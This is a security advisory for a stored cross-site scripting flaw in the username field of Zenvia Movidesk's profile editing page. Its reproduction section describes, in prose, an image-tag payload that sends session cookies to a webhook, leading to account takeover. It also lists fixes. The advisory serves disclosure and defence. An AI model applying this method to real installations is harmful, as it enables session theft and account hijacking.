Zenvia Movidesk Cross-Site Scripting Vulnerability in Profile Editing Component

A cross-site scripting (XSS) vulnerability has been identified in Zenvia Movidesk versions prior to 25.01.22. The issue resides in the Profile Editing component, specifically within the '/Account/EditProfile' file. The vulnerability allows for the injection of malicious scripts through the 'username' argument, which can be executed remotely. This flaw has been publicly disclosed and can be exploited by changing the username to include an XSS payload, which is then executed when other users view related tickets, potentially leading to an Account Takeover (ATO) scenario.

Impact

Exploitation of this vulnerability allows for stored cross-site scripting, where injected scripts are executed automatically when other users access affected tickets. This could lead to theft of session cookies, facilitating an Account Takeover without user interaction, and could also allow for privilege escalation if administrative credentials are compromised.

Reproduction

To reproduce this vulnerability, access the profile editing endpoint and change the username to include an XSS payload, such as an image tag with a source pointing to a webhook that captures cookies. After saving the changes, the payload will be executed when the ticket is viewed, demonstrating the cross-site scripting vulnerability.

Remediation

Users are advised to upgrade to Zenvia Movidesk version 25.01.22.245a473c54. Additionally, implementing input sanitization, output escaping, configuring session cookies with the HttpOnly flag, applying a restrictive Content Security Policy, and conducting regular security audits can help mitigate similar vulnerabilities.